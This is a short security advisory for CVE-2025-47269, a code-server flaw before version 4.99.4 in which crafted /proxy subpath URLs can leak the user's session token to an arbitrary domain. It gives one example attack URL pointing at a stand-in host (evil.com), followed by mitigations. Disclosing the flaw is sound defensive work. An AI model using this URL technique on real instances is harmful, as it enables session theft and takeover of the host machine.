CVE-2025-47269

Name of the Vulnerable Software and Affected Versions code-server versions prior to 4.99.4

Description The issue allows an attacker to gain access to the session token through a maliciously crafted URL using the proxy subpath. This can result in the attacker proxying to an arbitrary domain, potentially exfiltrating a user's session token. The malicious URL, for example https://<code-server>/proxy/test@evil.com/path, would be proxied to test@evil.com/path. With access to the session cookie, the attacker can log into code-server and have full access to the machine hosting code-server as the user running code-server.

Recommendations For versions prior to 4.99.4, update to version 4.99.4 to resolve the issue. As a temporary workaround, consider disabling the built-in proxy until a patch is available. Restrict access to the proxy subpath to minimize the risk of exploitation. Avoid clicking on maliciously crafted links that reference the /proxy subpath in code-server instances.